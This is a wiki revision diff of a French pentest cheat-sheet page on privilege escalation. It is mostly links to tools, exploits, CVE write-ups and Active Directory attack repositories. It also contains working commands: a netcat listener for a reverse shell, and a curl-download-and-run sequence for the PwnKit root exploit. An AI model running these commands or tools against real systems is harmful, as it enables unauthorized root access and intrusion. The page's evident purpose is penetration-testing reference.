Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

--- privilege_escalation [2022/12/13 19:03]
M0N5T3R
+++ privilege_escalation [2024/06/04 12:02] (Version actuelle)
M0N5T3R
@@ Ligne 1: / Ligne 1: @@
 {{ :privesc.jpg?nolink&1600 |}}
+====== MacOs ======
+    https://www.ns-echo.com/posts/cve_2023_33298.html
+====== docker ======
+    https://flast101.github.io/docker-privesc/
+    https://github.com/stealthcopter/deepce
+====== active directory ======
+    https://github.com/CravateRouge/bloodyAD
+    https://github.com/antonioCoco/RemotePotato0
+    https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
+    https://github.com/Dec0ne/KrbRelayUp
+    https://github.com/GhostPack/Certify
+    https://github.com/mandiant/ADFSDump
@@ Ligne 36: / Ligne 53: @@
-  * WINPEAS Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz  and check more information about how to exploit found misconfigurations in book.hacktricks.xyz https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
+  * WINPEAS : WINPEAS Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz  and check more information about how to exploit found misconfigurations in book.hacktricks.xyz https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
+  * WindowsEnum :A Powershell Privilege Escalation Enumeration Script.z
+https://github.com/absolomb/WindowsEnum
   * Watson 2.0 : Windows 10 1507, 1511, 1607, 1703, 1709, 1803, 1809 --- Server 2016 & 2019 https://github.com/rasta-mouse/Watson
@@ Ligne 53: / Ligne 72: @@
   * https://github.com/enjoiz/Privesc
   * https://github.com/GhostPack/Seatbelt
+  * https://github.com/knight0x07/ImpulsiveDLLHijack
+  * https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
   * site:exploit-db.com privilege escalation windows 7
   * https://github.com/abatchy17/WindowsExploits - Collection of precompiled Windows exploits
@@ Ligne 64: / Ligne 85: @@
   *-> post/multi/recon/local_exploit_suggester - suggests local meterpreter exploits that can be used
   *-> post/windows/gather/enum_patches - helps to identify any missing patches
@@ Ligne 76: / Ligne 99: @@
   * -> Depuis kali : nc -nlvp 7777
+**Liste de ressources :**
+    https://www.redtimmy.com/privilege-escalation/pulse-secure-client-for-windows-9-1-6-toctou-privilege-escalation-cve-2020-13162/
+    https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities
+    https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers
+    CVE-2024-20656 – Local Privilege Escalation in the VSStandardCollectorService150 Service
+    https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks
+    https://github.com/LordNoteworthy/windows-exploitation
+    https://nixhacker.com/understanding-and-exploiting-symbolic-link-in-windows/
+    https://troopers.de/downloads/troopers19/TROOPERS19_AD_Abusing_privileged_file_operations.pdf
+    https://blog.zecops.com/research/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/
+    https://offsec.almond.consulting/intro-to-file-operation-abuse-on-Windows.html
+    https://www.cyberark.com/resources/threat-research-blog/follow-the-link-exploiting-symbolic-links-with-ease
+    https://github.com/Wh04m1001?tab=repositories
+    https://secret.club/2020/04/23/directory-deletion-shell.html
+    https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
+**Liste de writeups**
+    https://dreamlab.net/en/blog/post/dropbox-escalation-of-privileges-to-system-on-windows-1/
+    https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/
+    https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/
+    https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service
 ====== Linux ======
@@ Ligne 98: / Ligne 150: @@
 **Linux Privilege Escalation using SUID Binaries**
 https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
 **Escalate to root using pkexec**
   * curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit || exit
-  * chmod +x ./PwnKit || exit
+  * chmod +x PwnKit
-  * (sleep 1 && rm ./PwnKit & )
   * ./PwnKit
@@ Ligne 210: / Ligne 265: @@
 LinPEAS - Linux Privilege Escalation Awesome Script https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
+Linux enumeration tools for pentesting and CTFs - https://github.com/diego-treitos/linux-smart-enumeration
 **auto exploit**

Zenk - Security

Outils d'utilisateurs

Outils du Site

Différences

Outils de la Page